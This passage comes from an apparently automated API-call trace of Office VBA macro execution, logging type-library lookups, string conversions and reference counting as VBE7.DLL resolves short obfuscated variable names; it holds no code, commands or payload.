pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.550] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4990000 [0068.550] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.550] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.550] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.551] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.551] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.551] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.551] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.551] IUnknown:Release (This=0x665ba50) returned 0xb [0068.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2cf6, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="d4AAZA") returned 7 [0068.551] ITypeComp:RemoteBind (in: This=0x665ba60, szName="d4AAZA", lHashVal=0x103540, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2cf6, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="d4AAZA") returned 7 [0068.551] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="d4AAZA", lHashVal=0x103540, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2cf6, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="d4AAZA") returned 7 [0068.551] ITypeComp:RemoteBind (in: This=0x665bd30, szName="d4AAZA", lHashVal=0x103540, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.551] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="d4AAZA") returned 0x103540 [0068.551] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="d4AAZA" | out: _Dst="d4AAZA") returned 0x0 [0068.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="d4AAZA") returned 7 [0068.552] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.552] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="d4AAZA", lHashVal=0x103540, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.552] IUnknown:Release (This=0x665ba50) returned 0xb [0068.552] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.552] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="d4AAZA", lHashVal=0x103540, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.552] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.552] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.552] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="d4AAZA", lHashVal=0x103540, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.552] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.552] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.552] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="d4AAZA", lHashVal=0x103540, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.552] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2cf6, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="d4AAZA") returned 7 [0068.552] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="d4AAZA", lHashVal=0x103540, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.552] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.552] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2cf6 | out: _Dst=0x67c2d40) returned 0x0 [0068.552] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_d4AAZA") returned 0x10afe9 [0068.552] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MAkc4kcA", cchCount1=-1, lpString2="_B_var_d4AAZA", cchCount2=-1) returned 3 [0068.552] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_d4AAZA" | out: _Dst="_B_var_d4AAZA") returned 0x0 [0068.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_d4AAZA") returned 14 [0068.552] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.552] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_d4AAZA", lHashVal=0x10afe9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.552] IUnknown:Release (This=0x665ba50) returned 0xb [0068.552] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.552] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_d4AAZA", lHashVal=0x10afe9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.552] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.552] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.552] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_d4AAZA", lHashVal=0x10afe9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.552] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.553] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.553] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_d4AAZA", lHashVal=0x10afe9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.553] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.553] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.553] IUnknown:Release (This=0x665ba50) returned 0xb [0068.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc22ca, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_d4AAZA") returned 14 [0068.553] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_d4AAZA", lHashVal=0x10afe9, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x64005f00720061, ppTypeComp=0x5a004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x64005f00720061, ppTypeComp=0x5a004100000000, pDummy=0x0) returned 0x0 [0068.553] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2cf6 | out: _Dst=0x145020) returned 0x0 [0068.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2dee, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="MDUABU") returned 7 [0068.553] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MDUABU", lHashVal=0x108e2f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2dee, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="MDUABU") returned 7 [0068.553] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MDUABU", lHashVal=0x108e2f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2dee, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="MDUABU") returned 7 [0068.553] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MDUABU", lHashVal=0x108e2f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.553] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MDUABU") returned 0x108e2f [0068.553] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="MDUABU" | out: _Dst="MDUABU") returned 0x0 [0068.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="MDUABU") returned 7 [0068.553] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.554] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MDUABU", lHashVal=0x108e2f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.554] IUnknown:Release (This=0x665ba50) returned 0xb [0068.554] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.554] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MDUABU", lHashVal=0x108e2f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.554] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.554] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.554] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MDUABU", lHashVal=0x108e2f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.554] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.554] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.554] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MDUABU", lHashVal=0x108e2f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.554] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2dee, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="MDUABU") returned 7 [0068.554] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MDUABU", lHashVal=0x108e2f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.554] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.554] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2dee | out: _Dst=0x67c2d40) returned 0x0 [0068.554] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MDUABU") returned 0x100899 [0068.554] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_MDUABU" | out: _Dst="_B_var_MDUABU") returned 0x0 [0068.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_MDUABU") returned 14 [0068.554] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.554] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MDUABU", lHashVal=0x100899, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.554] IUnknown:Release (This=0x665ba50) returned 0xb [0068.554] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.554] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MDUABU", lHashVal=0x100899, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.554] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.554] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.554] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MDUABU", lHashVal=0x100899, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.554] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.554] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.554] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MDUABU", lHashVal=0x100899, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.555] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.555] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.555] IUnknown:Release (This=0x665ba50) returned 0xb [0068.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc22fa, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_MDUABU") returned 14 [0068.555] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MDUABU", lHashVal=0x100899, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4d005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4d005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0068.555] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2dee | out: _Dst=0x145020) returned 0x0 [0068.555] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NAAQUUG", lHashVal=0x108165, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2dc6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="NAAQUUG") returned 8 [0068.555] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NAAQUUG", lHashVal=0x108165, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2dc6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="NAAQUUG") returned 8 [0068.555] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NAAQUUG", lHashVal=0x108165, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.555] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAAQUUG") returned 0x108165 [0068.555] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="NAAQUUG" | out: _Dst="NAAQUUG") returned 0x0 [0068.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="NAAQUUG") returned 8 [0068.555] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.555] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NAAQUUG", lHashVal=0x108165, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.555] IUnknown:Release (This=0x665ba50) returned 0xb [0068.555] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.555] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NAAQUUG", lHashVal=0x108165, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.555] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.555] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.555] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NAAQUUG", lHashVal=0x108165, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.556] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.556] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.556] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NAAQUUG", lHashVal=0x108165, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.556] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2dc6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="NAAQUUG") returned 8 [0068.556] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NAAQUUG", lHashVal=0x108165, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.556] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.556] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2dc6 | out: _Dst=0x67c2d40) returned 0x0 [0068.556] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NAAQUUG") returned 0x1084e9 [0068.556] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_NAAQUUG" | out: _Dst="_B_var_NAAQUUG") returned 0x0 [0068.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_NAAQUUG") returned 15 [0068.556] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.556] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NAAQUUG", lHashVal=0x1084e9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.556] IUnknown:Release (This=0x665ba50) returned 0xb [0068.556] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.556] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NAAQUUG", lHashVal=0x1084e9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.556] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.556] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.556] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NAAQUUG", lHashVal=0x1084e9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.556] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.556] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.556] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NAAQUUG", lHashVal=0x1084e9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.556] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.556] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.556] IUnknown:Release (This=0x665ba50) returned 0xb [0068.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc232a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_NAAQUUG") returned 15 [0068.556] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NAAQUUG", lHashVal=0x1084e9, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4e005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4e005f00720061, ppTypeComp=0x55005100000000, pDummy=0x0) returned 0x0 [0068.557] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2dc6 | out: _Dst=0x145020) returned 0x0 [0068.557] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144c60, pIndex=0x0 | out: ppTLib=0x144c60*=0x665ba50, pIndex=0x0) returned 0x0 [0068.557] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144c70, pDummy=0x0 | out: ppTLibAttr=0x144c70, pDummy=0x0) returned 0x0 [0068.557] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.557] IUnknown:Release (This=0x665ba50) returned 0xb [0068.557] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144c60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.557] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144c60, pbstrName=0x0, pwOrdinal=0x144c80 | out: pBstrDllName=0x144c60*=0x0, pbstrName=0x0, pwOrdinal=0x144c80*=0x4ef0) returned 0x0 [0068.557] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144c60, 